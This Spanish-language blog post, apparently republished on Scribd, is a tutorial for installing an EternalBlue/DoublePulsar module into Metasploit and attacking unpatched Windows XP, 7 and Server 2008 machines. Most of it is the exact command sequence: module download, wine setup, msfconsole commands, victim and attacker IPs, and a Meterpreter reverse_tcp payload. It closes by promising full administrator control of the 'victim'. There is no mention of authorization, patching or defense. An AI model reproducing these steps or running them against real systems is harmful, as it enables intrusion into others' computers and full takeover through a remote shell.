0% encontró este documento útil (0 votos)
160 vistas4 páginas

Instala EternalBlue en Metasploit

Este documento proporciona instrucciones para instalar el módulo EternalBlue en Metasploit para explotar sistemas vulnerables de Windows XP, 7 y Server 2008. Explica cómo descargar e instalar el módulo desde GitHub, mover el archivo al directorio correcto en Metasploit y configurar la IP de la víctima y la máquina del atacante antes de ejecutar el exploit para obtener acceso de administrador a la máquina mediante Meterpreter.

Cargado por

Tio Whoami
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como DOCX, PDF, TXT o lee en línea desde Scribd
0% encontró este documento útil (0 votos)
160 vistas4 páginas

Instala EternalBlue en Metasploit

Este documento proporciona instrucciones para instalar el módulo EternalBlue en Metasploit para explotar sistemas vulnerables de Windows XP, 7 y Server 2008. Explica cómo descargar e instalar el módulo desde GitHub, mover el archivo al directorio correcto en Metasploit y configurar la IP de la víctima y la máquina del atacante antes de ejecutar el exploit para obtener acceso de administrador a la máquina mediante Meterpreter.

Cargado por

Tio Whoami
Derechos de autor
© © All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como DOCX, PDF, TXT o lee en línea desde Scribd

EternalBlue en Metasploit - SMB Exploit -

Sh4Rk_0 marzo 22, 2018  doublepulsar, eternalblue, exploit, hack windows, meterpreter

    En esta ocasión estaré mostrando como instalar el modulo


de EternalBlue en MetaSploit para atacar sistemas vulnerables windows los cuales son
windows xp, 7 & server 2008. Esta herramienta fue filtrada de la NSA el pasado año la cual
atacaba una vulnerabilidad en los sistemas mencionados.

Bien primero debemos descargar el modulo desde su repositorio de Github.

> https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git

> dpkg --add-architecture i386 && apt-get update && apt-get install wine32

Luego descargamos python2.7 y pywin32, instalamos ambos .exe con wine

Una vez lo tengamos descargados debemos mover el archivo eternalblue_doublepulsar.rb a


la ruta  /usr/share/metasploit-framework/modules/exploits/windows/smb/ y listo ahora
pasamos a abrir nuestro metasploit
> msfconsole

> use exploit/windows/smb/eternalblue_doublepulsar

Luego le indicamos la ruta en la cual tenemos nuestro archivo de eternalblue.

> set eternalbluepath /root/Eternalblue-Doublepulsar-Metasploit/deps

Ahora le pasaremos la ip de nuestra victima y luego la ip de nuestra maquina.

> rhost 192.168.0.9

> lhost 192.168.0.11

y le indicamos el tipo de payload.

> set payload windows/x64/meterpreter/reverse_tcp

> exploit
 Una vez ejecutemos el comando exploit hará el proceso del envió de el DLL malicioso a la
maquina victima para a si ejecutar nuestro payload. En caso de que nos de error es que la
maquina no tiene el puerto 445 abierto o simplemente no es vulnerable. Existen maneras de
comprobar si ese puerto esta abierto y también podríamos saber si nuestra victima es
vulnerable o no.
Y como podemos ver ya tendríamos nuestra meterpreter y lo mejor de todo es que tendremos
todos los permisos de administrador teniendo control total de la maquina.

Espero que les haya gustado este post, no olviden compartir y dar me gusta a nuestra pagina.

También podría gustarte